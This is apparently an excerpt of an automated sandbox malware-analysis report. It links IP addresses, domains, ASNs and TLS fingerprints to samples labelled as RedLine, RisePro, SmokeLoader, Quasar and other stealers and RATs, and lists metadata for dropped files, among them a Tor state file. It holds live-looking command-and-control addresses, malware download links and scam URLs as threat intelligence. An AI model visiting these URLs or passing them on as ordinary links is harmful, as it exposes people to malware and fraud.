10:02:37	API Interceptor	2179x Sleep call for process: 8F82.exe modified
10:02:41	API Interceptor	14x Sleep call for process: 7FE0.exe modified
10:03:04	API Interceptor	25x Sleep call for process: 932079.exe modified
10:03:13	API Interceptor	67x Sleep call for process: jsc.exe modified
10:03:15	API Interceptor	20x Sleep call for process: 9AED.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
194.49.94.210	vSlVoTPrmP.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	194.49.94.210/fks/index.php
	RO67OsrIWi.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	194.49.94.210/fks/index.php
	NxrkCS4fDD.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	194.49.94.210/fks/index.php
	7WOfaFsPQv.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	194.49.94.210/fks/index.php
	Rgi3BxJNQJ.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig, zgRAT	Browse	194.49.94.210/fks/index.php
	2y1JbYuXUD.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	194.49.94.210/fks/index.php
	ud704TETEP.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig, zgRAT	Browse	194.49.94.210/fks/index.php
64.227.21.98	vSlVoTPrmP.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse
	RO67OsrIWi.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse
	NxrkCS4fDD.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse
	7WOfaFsPQv.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse
194.49.94.152	M32YntpPPb.exe	Get hash	malicious	PrivateLoader, RedLine, RisePro Stealer, SmokeLoader	Browse
	vSlVoTPrmP.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse
	RO67OsrIWi.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse
	NxrkCS4fDD.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse
	7WOfaFsPQv.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse
	Rgi3BxJNQJ.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig, zgRAT	Browse
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse
	2y1JbYuXUD.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse
	IezdgnlRuc.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse
	LmdaUpVCy2.exe	Get hash	malicious	Glupteba, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader	Browse
	5oObCKNcvv.exe	Get hash	malicious	PrivateLoader, RedLine, SmokeLoader	Browse
	I6LOSz3ntW.exe	Get hash	malicious	Glupteba, LummaC Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig	Browse
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse
	A3UIKTOFL8.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse
	TVCulwlnAB.exe	Get hash	malicious	PrivateLoader, RedLine, RisePro Stealer	Browse
	cSct63c62f.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse
	ud704TETEP.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig, zgRAT	Browse
	Ho8gbtwqa1.exe	Get hash	malicious	PrivateLoader, RedLine, RisePro Stealer	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ipinfo.io	M32YntpPPb.exe	Get hash	malicious	PrivateLoader, RedLine, RisePro Stealer, SmokeLoader	Browse	34.117.59.81
	vSlVoTPrmP.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	34.117.59.81
	RO67OsrIWi.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	34.117.59.81
	NxrkCS4fDD.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	34.117.59.81
	7WOfaFsPQv.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	34.117.59.81
	Rgi3BxJNQJ.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig, zgRAT	Browse	34.117.59.81
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	34.117.59.81
	8XPubUyrEI.exe	Get hash	malicious	DCRat	Browse	34.117.59.81
	enelfacturanopagada.msi	Get hash	malicious	Unknown	Browse	34.117.59.81
	2y1JbYuXUD.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	34.117.59.81
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	34.117.59.81
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	34.117.59.81
	IezdgnlRuc.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	34.117.59.81
	LmdaUpVCy2.exe	Get hash	malicious	Glupteba, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader	Browse	34.117.59.81
	I6LOSz3ntW.exe	Get hash	malicious	Glupteba, LummaC Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig	Browse	34.117.59.81
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	34.117.59.81
	file.exe	Get hash	malicious	PrivateLoader	Browse	34.117.59.81
	A3UIKTOFL8.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	34.117.59.81
	TVCulwlnAB.exe	Get hash	malicious	PrivateLoader, RedLine, RisePro Stealer	Browse	34.117.59.81
	cSct63c62f.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	34.117.59.81
github.com	vSlVoTPrmP.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	20.29.134.23
	RO67OsrIWi.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	20.29.134.23
	NxrkCS4fDD.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	20.29.134.23
	7WOfaFsPQv.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	20.29.134.23
	Rgi3BxJNQJ.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig, zgRAT	Browse	20.29.134.23
	2y1JbYuXUD.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	20.29.134.23
	ud704TETEP.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig, zgRAT	Browse	20.29.134.23
	nf.msi	Get hash	malicious	Xmrig	Browse	20.29.134.23
	https://jucatyo6.autodesk360.com/shares/download/file/SHd38bfQT1fb47330c9913f77fed35c0c8f8/dXJuOmFkc2sud2lwcHJvZDpmcy5maWxlOnZmLmdjeXRGalZVUXVPejRQXzNhWHQ1cXc_dmVyc2lvbj04#a62cf1b2716043e8aa3ea9062b86a7	Get hash	malicious	Xmrig	Browse	20.29.134.23
	trmm-cocody-nono-workstation-amd64.exe	Get hash	malicious	Unknown	Browse	20.29.134.23
	trmm-cocody-nono-workstation-amd64.exe	Get hash	malicious	Unknown	Browse	20.29.134.23
	nf.msi	Get hash	malicious	Xmrig	Browse	20.29.134.23
	https://is.gd/DkoNrW#cbd0626ff2e9466296a28c6b273d15	Get hash	malicious	Xmrig	Browse	20.29.134.23
	Pdf.jar	Get hash	malicious	STRRAT	Browse	20.29.134.23
	nf.msi	Get hash	malicious	Xmrig	Browse	20.29.134.23
	OH8FRaSl51.exe	Get hash	malicious	Unknown	Browse	20.29.134.23
	OH8FRaSl51.exe	Get hash	malicious	Unknown	Browse	20.29.134.23
	Install.msi	Get hash	malicious	Xmrig	Browse	20.29.134.23
ipwho.is	vSlVoTPrmP.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	147.135.36.89
	RO67OsrIWi.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	147.135.36.89
	CcYL4V9Z6p.exe	Get hash	malicious	Quasar	Browse	147.135.36.89
	explorer.exe	Get hash	malicious	Quasar	Browse	147.135.36.89
	https://fpso-yfb3p.ondigitalocean.app/rkEX0win0x0786x0999xrkhkxpErr999x/index.php?click_id=611h5axzlp1fwctf&clickid=68ef85ae89b43fdcef0a32b9b672626f&phone=+1-833-741-5228&rezp=611h5axzlp1fwctf-tncle.com-658#	Get hash	malicious	TechSupportScam	Browse	147.135.36.89
	http://103.30.76.56:8000	Get hash	malicious	GhostRat, Quasar	Browse	147.135.36.89
	m90dF9Nbdm.exe	Get hash	malicious	Eagle RAT, Quasar	Browse	147.135.36.89
	2C8CDA2CCC942B4EDA8E1EE37A8F68C557FEE80E14244.exe	Get hash	malicious	Quasar	Browse	147.135.36.89
	XS3sNotzzw.exe	Get hash	malicious	Unknown	Browse	147.135.36.89
	XS3sNotzzw.exe	Get hash	malicious	Unknown	Browse	147.135.36.89
	http://matthiasparks.site/4930%20New/Win08Ay0Er08d8d77/index.html	Get hash	malicious	TechSupportScam	Browse	147.135.36.89
	https://errorfilexxxrunr002.z9.web.core.windows.net/Win08ShDMeEr0887/index.html	Get hash	malicious	TechSupportScam	Browse	15.204.213.5
	Pgqa38l8Zj.exe	Get hash	malicious	Quasar	Browse	15.204.213.5
	https://d1d45mn9eemjc7.cloudfront.net/	Get hash	malicious	Unknown	Browse	15.204.213.5
	https://cdn.discordapp.com/attachments/1167807485307002965/1167807812047478854/bet2023.exe?ex=654f78c7&is=653d03c7&hm=d31a6ed3bb0b57c45062f127164116feb7b3623fdd73879bed9662bb9c9e4c5a	Get hash	malicious	Unknown	Browse	15.204.213.5
	PingOptimizerMain.bat	Get hash	malicious	Quasar	Browse	15.204.213.5
	WJJEBk9bRN.exe	Get hash	malicious	Quasar	Browse	15.204.213.5
	https://terebinajeenafb10.s3.ap-south-1.amazonaws.com/Win08SmtDaEr08d8d77/index.html#	Get hash	malicious	TechSupportScam	Browse	15.204.213.5
	RX3Ct1J80p.exe	Get hash	malicious	Quasar	Browse	15.204.213.5
	NatureSetup.exe	Get hash	malicious	Unknown	Browse	108.181.47.111

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
EQUEST-ASNL	M32YntpPPb.exe	Get hash	malicious	PrivateLoader, RedLine, RisePro Stealer, SmokeLoader	Browse	194.49.94.152
	ZWM8hP7FnI.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Vidar, Xmrig	Browse	194.49.94.77
	vSlVoTPrmP.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	194.49.94.80
	RO67OsrIWi.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	194.49.94.80
	NxrkCS4fDD.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	194.49.94.80
	RuoG5r34jc.exe	Get hash	malicious	Glupteba, Mystic Stealer, RedLine, SmokeLoader	Browse	194.49.94.120
	7WOfaFsPQv.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	194.49.94.80
	Rgi3BxJNQJ.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig, zgRAT	Browse	194.49.94.80
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	194.49.94.152
	file.exe	Get hash	malicious	Djvu, Glupteba, LummaC Stealer, Meduza Stealer, RedLine, SmokeLoader	Browse	194.49.94.77
	2y1JbYuXUD.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	194.49.94.80
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	194.49.94.152
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Meduza Stealer, RedLine, SmokeLoader	Browse	194.49.94.77
	IezdgnlRuc.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	194.49.94.152
	LmdaUpVCy2.exe	Get hash	malicious	Glupteba, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader	Browse	194.49.94.80
	5oObCKNcvv.exe	Get hash	malicious	PrivateLoader, RedLine, SmokeLoader	Browse	194.49.94.152
	I6LOSz3ntW.exe	Get hash	malicious	Glupteba, LummaC Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig	Browse	194.49.94.120
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	194.49.94.152
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Meduza Stealer, RedLine, SmokeLoader	Browse	194.49.94.142
	file.exe	Get hash	malicious	RedLine	Browse	194.49.94.142
DIGITALOCEAN-ASNUS	Sars_Notification.exe	Get hash	malicious	DBatLoader, FormBook	Browse	167.172.228.26
	vSlVoTPrmP.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	206.189.109.146
	RO67OsrIWi.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	206.189.109.146
	NxrkCS4fDD.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	206.189.109.146
	7WOfaFsPQv.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	206.189.109.146
	InstallerEasy_v9n.9.exe	Get hash	malicious	Unknown	Browse	95.85.16.212
	InstallerEasy_v9n.9.exe	Get hash	malicious	Unknown	Browse	95.85.16.212
	ParsecApp-2.5.6-win-64.msi	Get hash	malicious	Unknown	Browse	95.85.16.212
	ParsecApp-2.5.6-win-64.msi	Get hash	malicious	Unknown	Browse	95.85.16.212
	Rgi3BxJNQJ.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig, zgRAT	Browse	206.189.109.146
	Oca0DCYS2Q.msi	Get hash	malicious	Unknown	Browse	95.85.16.212
	2y1JbYuXUD.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	206.189.109.146
	https://vignetteslearning.us20.list-manage.com/track/click?u=fd68d151485ff2f477c2a8728&id=77c24ae5de&e=b92caa1ca8	Get hash	malicious	Unknown	Browse	138.197.230.51
	ud704TETEP.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig, zgRAT	Browse	206.189.109.146
	https://www.google.com/url?q=https%3A%2F%2Fesfourindia.com%2Fsuperr%2F%3Femail%3D&sa=D&sntz=1&usg=AOvVaw1cQEDHK90T4Y6eri6Joe5T	Get hash	malicious	HTMLPhisher	Browse	207.154.221.211
	RQzHm5vLxs.exe	Get hash	malicious	Sodinokibi, Chaos, Conti, Netwalker, Revil, TrojanRansom	Browse	138.197.111.104
	https://strava.app.link/38598S3p?%243p=e_et&%24original_url=https%3A%2F%2Fbaidu.com///link?url=neMQr9azEt--a_UsVGmVNYkDEUPjN_x4zDzsSLNy7lC&wd#.ZXR1emFpdGVAYmlvbGVnZW5kLmNvbQ==	Get hash	malicious	Fake Captcha	Browse	142.93.172.50
	https://monydine.co/category/work/index.html	Get hash	malicious	Unknown	Browse	68.183.18.251
	http://dalinoxin.de	Get hash	malicious	Unknown	Browse	192.241.145.154
	https://strava.app.link/66876S3p?%243p=e_et&%24original_url=https%3A%2F%2Fbaidu.com///link?url=neMQr9azEt--a_UsVGmVNYkDEUPjN_x4zDzsSLNy7lC&wd#.cnZhbGVudGluQGJpb2xlZ2VuZC5jb20=	Get hash	malicious	Fake Captcha	Browse	142.93.172.50
EQUEST-ASNL	M32YntpPPb.exe	Get hash	malicious	PrivateLoader, RedLine, RisePro Stealer, SmokeLoader	Browse	194.49.94.152
	ZWM8hP7FnI.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Vidar, Xmrig	Browse	194.49.94.77
	vSlVoTPrmP.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	194.49.94.80
	RO67OsrIWi.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	194.49.94.80
	NxrkCS4fDD.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	194.49.94.80
	RuoG5r34jc.exe	Get hash	malicious	Glupteba, Mystic Stealer, RedLine, SmokeLoader	Browse	194.49.94.120
	7WOfaFsPQv.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	194.49.94.80
	Rgi3BxJNQJ.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig, zgRAT	Browse	194.49.94.80
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	194.49.94.152
	file.exe	Get hash	malicious	Djvu, Glupteba, LummaC Stealer, Meduza Stealer, RedLine, SmokeLoader	Browse	194.49.94.77
	2y1JbYuXUD.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	194.49.94.80
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	194.49.94.152
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Meduza Stealer, RedLine, SmokeLoader	Browse	194.49.94.77
	IezdgnlRuc.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	194.49.94.152
	LmdaUpVCy2.exe	Get hash	malicious	Glupteba, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader	Browse	194.49.94.80
	5oObCKNcvv.exe	Get hash	malicious	PrivateLoader, RedLine, SmokeLoader	Browse	194.49.94.152
	I6LOSz3ntW.exe	Get hash	malicious	Glupteba, LummaC Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig	Browse	194.49.94.120
	file.exe	Get hash	malicious	PrivateLoader, RisePro Stealer	Browse	194.49.94.152
	file.exe	Get hash	malicious	Glupteba, LummaC Stealer, Meduza Stealer, RedLine, SmokeLoader	Browse	194.49.94.142
	file.exe	Get hash	malicious	RedLine	Browse	194.49.94.142

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	vSlVoTPrmP.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	104.21.35.168
	RO67OsrIWi.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	104.21.35.168
	0ag5VwwaFc.exe	Get hash	malicious	XFiles Stealer	Browse	104.21.35.168
	81b73.msi	Get hash	malicious	Unknown	Browse	104.21.35.168
	bRxR.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	104.21.35.168
	bRxV.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	104.21.35.168
	https://docs.google.com/presentation/d/e/2PACX-1vQXwJGYCbPI16K_eug5eSPTHkDBlKxuOiuXXXIAOTBGTmPYDRvnBJ_y4bYbzmEB2_aOFHa3WP76GKQd/pub?start=false&loop=false&delayms=3000&slide=id.p	Get hash	malicious	Unknown	Browse	104.21.35.168
	https://docs.google.com/presentation/d/e/2PACX-1vTh8U4lhWdUefvS3FelaexG-_NQdfmx_w2tW4Tb24bgi4Xhd9YOuFBCk5UZpGRwQ334aMuDJn1TFhFG/pub?start=false&loop=false&delayms=3000	Get hash	malicious	HTMLPhisher	Browse	104.21.35.168
	ancDTUND3Q.exe	Get hash	malicious	Unknown	Browse	104.21.35.168
	z9BonmSWnN.exe	Get hash	malicious	AsyncRAT	Browse	104.21.35.168
	bRr6.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	104.21.35.168
	bRr6.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	104.21.35.168
	7vMlxrQM7n.exe	Get hash	malicious	AveMaria, PrivateLoader	Browse	104.21.35.168
	QvConnect32.EXE.exe	Get hash	malicious	Agniane Stealer, zgRAT	Browse	104.21.35.168
	file.exe	Get hash	malicious	XFiles Stealer	Browse	104.21.35.168
	HEUR-Backdoor.MSIL.Androm.gen-878555f3bd2bfb9.exe	Get hash	malicious	LimeRAT	Browse	104.21.35.168
	BqgnX7ARug.exe	Get hash	malicious	AveMaria, PrivateLoader	Browse	104.21.35.168
	bRio.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	104.21.35.168
	bRhZ.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	104.21.35.168
	bRhY.exe	Get hash	malicious	AsyncRAT, DcRat	Browse	104.21.35.168
3b5074b1b5d032e5620f69f9f700ff0e	txt.ps1	Get hash	malicious	AgentTesla	Browse	149.154.167.220 147.135.36.89 185.199.108.133 104.21.89.193 162.159.135.233 20.29.134.23 149.154.167.99
	lnvoice-1597256897.pdf.js	Get hash	malicious	AgentTesla	Browse	149.154.167.220 147.135.36.89 185.199.108.133 104.21.89.193 162.159.135.233 20.29.134.23 149.154.167.99
	STATEMENT_OCT_2023.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220 147.135.36.89 185.199.108.133 104.21.89.193 162.159.135.233 20.29.134.23 149.154.167.99
	vSlVoTPrmP.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	149.154.167.220 147.135.36.89 185.199.108.133 104.21.89.193 162.159.135.233 20.29.134.23 149.154.167.99
	RO67OsrIWi.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	149.154.167.220 147.135.36.89 185.199.108.133 104.21.89.193 162.159.135.233 20.29.134.23 149.154.167.99
	NxrkCS4fDD.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	149.154.167.220 147.135.36.89 185.199.108.133 104.21.89.193 162.159.135.233 20.29.134.23 149.154.167.99
	7WOfaFsPQv.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	149.154.167.220 147.135.36.89 185.199.108.133 104.21.89.193 162.159.135.233 20.29.134.23 149.154.167.99
	InstallerEasy_v9n.9.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 147.135.36.89 185.199.108.133 104.21.89.193 162.159.135.233 20.29.134.23 149.154.167.99
	InstallerEasy_v9n.9.exe	Get hash	malicious	Unknown	Browse	149.154.167.220 147.135.36.89 185.199.108.133 104.21.89.193 162.159.135.233 20.29.134.23 149.154.167.99
	ParsecApp-2.5.6-win-64.msi	Get hash	malicious	Unknown	Browse	149.154.167.220 147.135.36.89 185.199.108.133 104.21.89.193 162.159.135.233 20.29.134.23 149.154.167.99
	ParsecApp-2.5.6-win-64.msi	Get hash	malicious	Unknown	Browse	149.154.167.220 147.135.36.89 185.199.108.133 104.21.89.193 162.159.135.233 20.29.134.23 149.154.167.99
	Rgi3BxJNQJ.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, Xmrig, zgRAT	Browse	149.154.167.220 147.135.36.89 185.199.108.133 104.21.89.193 162.159.135.233 20.29.134.23 149.154.167.99
	Oca0DCYS2Q.msi	Get hash	malicious	Unknown	Browse	149.154.167.220 147.135.36.89 185.199.108.133 104.21.89.193 162.159.135.233 20.29.134.23 149.154.167.99
	CcYL4V9Z6p.exe	Get hash	malicious	Quasar	Browse	149.154.167.220 147.135.36.89 185.199.108.133 104.21.89.193 162.159.135.233 20.29.134.23 149.154.167.99
	SecuriteInfo.com.Trojan.Inject4.59820.20999.20761.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220 147.135.36.89 185.199.108.133 104.21.89.193 162.159.135.233 20.29.134.23 149.154.167.99
	8XPubUyrEI.exe	Get hash	malicious	DCRat	Browse	149.154.167.220 147.135.36.89 185.199.108.133 104.21.89.193 162.159.135.233 20.29.134.23 149.154.167.99
	2.vbs	Get hash	malicious	AgentTesla	Browse	149.154.167.220 147.135.36.89 185.199.108.133 104.21.89.193 162.159.135.233 20.29.134.23 149.154.167.99
	toprakkcv.xlsm	Get hash	malicious	Unknown	Browse	149.154.167.220 147.135.36.89 185.199.108.133 104.21.89.193 162.159.135.233 20.29.134.23 149.154.167.99
	2y1JbYuXUD.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	149.154.167.220 147.135.36.89 185.199.108.133 104.21.89.193 162.159.135.233 20.29.134.23 149.154.167.99
	https://manowebsm1.s3.amazonaws.com/PaymentProof31332.url	Get hash	malicious	Amadey	Browse	149.154.167.220 147.135.36.89 185.199.108.133 104.21.89.193 162.159.135.233 20.29.134.23 149.154.167.99

Process:	C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-real.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	3426
Entropy (8bit):	5.318725585159506
Encrypted:	false
SSDEEP:	48:c2hKeZmyw2iuXKjm2avULsEQt0q+5YUYmmXFN:thKeEyxDXKj+MATt0qzKmX7
MD5:	9B05719892D8C2DD0371BF1E882CFF17
SHA1:	B04A0990521A7F20D5BB928AEDEDF6ABB245B98C
SHA-256:	72B2CCD14A3A72D01B68BF4C4D23D1CE055886109DB84E3CBA8884A9BCEC15CD
SHA-512:	BDF9800B3A0470333D40FBC8EF1C4BBBB22AB2800B8155A0BB25AB208071284095D84A58A8B4526516A497EA3CBA2451019D8E9D6397B719C6242E39BAA55DD0
Malicious:	false
Reputation:	unknown
Preview:	# Tor state file last generated on 2023-11-18 10:03:25 local time..# Other times below are in UTC..# You do not need to edit this file.....Dormant 0..Guard in=default rsa_id=2E5FCBC791A615978CCDF32A77AD60DAD1DF1791 nickname=organGrinder sampled_on=2023-11-06T21:29:57 sampled_idx=0 sampled_by=0.4.5.10 listed=1..Guard in=default rsa_id=11DF0017A43AF1F08825CD5D973297F81AB00FF3 nickname=gGDHjdcC6zAlM8k08lX sampled_on=2023-11-11T03:31:33 sampled_idx=1 sampled_by=0.4.5.10 listed=1..Guard in=default rsa_id=BB80D7CDBE2A47DF1C54185204B0ACB9F17E2E28 nickname=prsv sampled_on=2023-11-07T17:03:57 sampled_idx=2 sampled_by=0.4.5.10 listed=1..Guard in=default rsa_id=28F31371C244E8B3014EBEFD64073581C1F492E9 nickname=RDPdotSH sampled_on=2023-11-07T15:19:38 sampled_idx=3 sampled_by=0.4.5.10 listed=1..Guard in=default rsa_id=B587EEC187B6199312F7C76E7ED342C8CA1BA9C6 nickname=DakotaEdge sampled_on=2023-11-14T23:01:17 sampled_idx=4 sampled_by=0.4.5.10 listed=1..Guard in=default rsa_id=5C3693C0E7B537553BAB3

C:\Users\user\AppData\Local\932079.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\8427.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	145920
Entropy (8bit):	5.586317072560208
Encrypted:	false
SSDEEP:	3072:oGlXG5eobrf35GO002X9CHWAhCr6m/bYQu5UwOl3xd:IxbrfcO002X9CHWAhCr6m/bYQu5UwOl
MD5:	6C209163F8881E51E553F6C1B306D645
SHA1:	9E6692F04C6CE18C4B95E9614B26DCBD47099DE7
SHA-256:	FC1B0F044807D4F0F7D3C68C1ADB2F38DA0F8A577E11322102559B6467C1FD21
